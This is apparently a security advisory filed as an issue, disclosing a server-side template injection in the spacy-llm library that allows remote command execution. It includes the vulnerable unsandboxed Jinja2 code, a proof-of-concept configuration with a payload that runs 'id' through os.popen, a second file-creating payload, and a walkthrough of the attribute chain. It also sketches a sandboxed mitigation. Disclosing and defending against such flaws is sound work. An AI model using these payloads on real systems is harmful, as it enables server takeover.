Server Side Template Injection in SpaCy-LLM allows Remote Command Execution

Open edoardottt opened this issue 1 year ago • 0 comments

Summary

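A Server-Side Template Injection (SSTI) in SpaCy-LLM allows Remote Command Execution on the server host. It is caused by rendering the task's template field with an unsandboxed Jinja2 environment, so an attacker who controls that field can execute arbitrary Python expressions.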

Details

Installation Steps

python -m venv .env
source .env/bin/activate
pip install -U pip setuptools wheel
pip install -U spacy
python -m pip install spacy-llm
python -m spacy download en_core_web_sm

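The vulnerability is caused by building the prompt with a plain jinja2.Environment, which does not restrict attribute access from within a template, and rendering the configured template string through it (https://github.com/explosion/spacy-llm/blob/main/spacy_llm/tasks/builtin_task.py).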

def generate_prompts(
...
    environment = jinja2.Environment()
    _template = environment.from_string(self._template)
...
def render_template(shard: Doc, i_shard: int, i_doc: int, n_shards: int) -> str:
...
            return _template.render(
                text=shard.text,
                prompt_examples=self._prompt_examples,
                **self._get_prompt_data(shard, i_shard, i_doc, n_shards),
            )
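For contrast with the excerpt above, here is a minimal sketch of how Jinja2's own sandbox handles the same kind of template. It assumes the jinja2 package is installed; the helper names render_sandboxed and is_blocked are hypothetical and are not part of spacy-llm, and this is not necessarily how the project fixed the issue. The payload uses a harmless echo command, which the sandbox never reaches.

```python
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Same attribute chain as the PoC, with a harmless command substituted in.
PAYLOAD = (
    "{{ self.__init__.__globals__.__builtins__"
    ".__import__('os').popen('echo hi').read() }}"
)


def render_sandboxed(template_source: str, **context) -> str:
    """Render a template string inside Jinja2's SandboxedEnvironment (hypothetical helper)."""
    env = SandboxedEnvironment()
    return env.from_string(template_source).render(**context)


def is_blocked(template_source: str) -> bool:
    """Return True if the sandbox refuses to render the template (hypothetical helper)."""
    try:
        render_sandboxed(template_source)
    except SecurityError:
        # Raised when the template touches an attribute the sandbox treats as unsafe,
        # such as names starting with an underscore.
        return True
    return False


if __name__ == "__main__":
    print("payload blocked:", is_blocked(PAYLOAD))
    print(render_sandboxed("Summarize: {{ text }}", text="hello"))
```

Ordinary templates that only read the variables passed to render() keep working, while access to underscore-prefixed attributes is refused before any command can run.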

PoC

import spacy

nlp = spacy.load("en_core_web_sm")

config = {
    "task": {
        "@llm_tasks": "spacy.Summarization.v1",
        "max_n_words": 100,
        "template": "{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}",
    },
    "model": {"@llm_models": "spacy.Dolly.v1", "name": "dolly-v2-3b"},
    "save_io": True,
}

llm = nlp.add_pipe("llm", config=config)
doc = "test"
doc = nlp(doc)
print(doc.user_data["llm_io"]["llm"]["prompt"])

# ['uid=1000(edoardottt) gid=1000(edoardottt) groups=1000(edoardottt), ...']

Another payload could be {{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned')}}, which creates a file called 'pwned' as soon as the API is called. Read more about Jinja2 SSTI here: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.
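To see why these payloads work, the attribute chain can be walked step by step in plain Python, outside of any template. This is only an illustrative sketch: the class Anything and the function walk_to_import are hypothetical stand-ins (the PoC starts from Jinja2's self object instead), and the final call is a harmless os.getcwd() rather than a shell command.

```python
import types


class Anything:
    """Stand-in for any Python object reachable from a template (hypothetical)."""

    def __init__(self):
        pass


def walk_to_import(obj):
    """Follow obj.__init__.__globals__['__builtins__'] to reach __import__."""
    # Step 1: a method written in Python exposes the globals of its defining module.
    module_globals = obj.__init__.__globals__
    # Step 2: module globals normally carry a reference to the builtins.
    builtins_ref = module_globals["__builtins__"]
    # __builtins__ is a module in __main__ and a dict in other modules; handle both.
    if isinstance(builtins_ref, types.ModuleType):
        return builtins_ref.__import__
    return builtins_ref["__import__"]


# Step 3: with __import__ in hand, any module (here os) can be loaded.
importer = walk_to_import(Anything())
os_module = importer("os")
print(os_module.getcwd())  # harmless call; the PoC calls popen() at this point
```

Inside a template the same chain can be written purely with dots, because Jinja2's attribute lookup falls back to subscript access when a plain attribute is not found.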

Note that:

  1. Setting save_io to True is only useful for reading the generated prompt; it is not needed in a real-world scenario.
  2. The vulnerability lies in the template field. All other fields are set only for the Proof of Concept, and an attacker doesn't need to control them.
  3. The vulnerability has been fixed here, but v0.7.2 is still vulnerable.

Impact

Attackers can run arbitrary system commands without any restriction (e.g. they could open a reverse shell and gain access to the server). The impact is critical, as the attacker can completely take over the server host.

Credits

Edoardo Ottavianelli

edoardottt, Jan 09 '25 09:01